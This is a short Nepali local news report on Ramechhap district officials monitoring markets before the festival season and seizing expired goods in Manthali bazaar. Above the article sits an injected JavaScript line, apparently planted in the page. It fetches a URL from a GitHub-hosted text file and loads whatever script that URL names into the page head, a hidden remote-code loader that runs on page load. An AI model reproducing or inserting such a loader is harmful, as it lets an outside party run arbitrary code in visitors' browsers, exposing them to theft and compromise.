;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज २१,
रामेछाप । जिल्ला प्रशासन कार्यालय रामेछापले चाड्वाड नजिकियसंगै बजार अनुगमन सुरु गरेको छ । मंगलबार प्रशासनका शाखा अधिकृत लेखनाथ खतिवडाको नेतृत्वमा, जिल्ला स्थित सरकारी कार्यालयका प्रतिनिधिहरुको संक्रयतामा बजाग अनुगमन गरिएको हो ।
मंगलबार सदरमुकाम समेत रहेको मन्थली बजारको अनुगमन गरि म्यान नाघेका अखाद्य वस्तहरु समेत बरामत गरेको छ । चाड्वाड नजिकियसंगै विगतका वर्षहरु जस्तै यो पटक पनि बजार अनुगनलाई तिवृ पारीने प्रशासनले जानकारी दिएको छ ।
फेसबुक प्रतिक्रियाहरु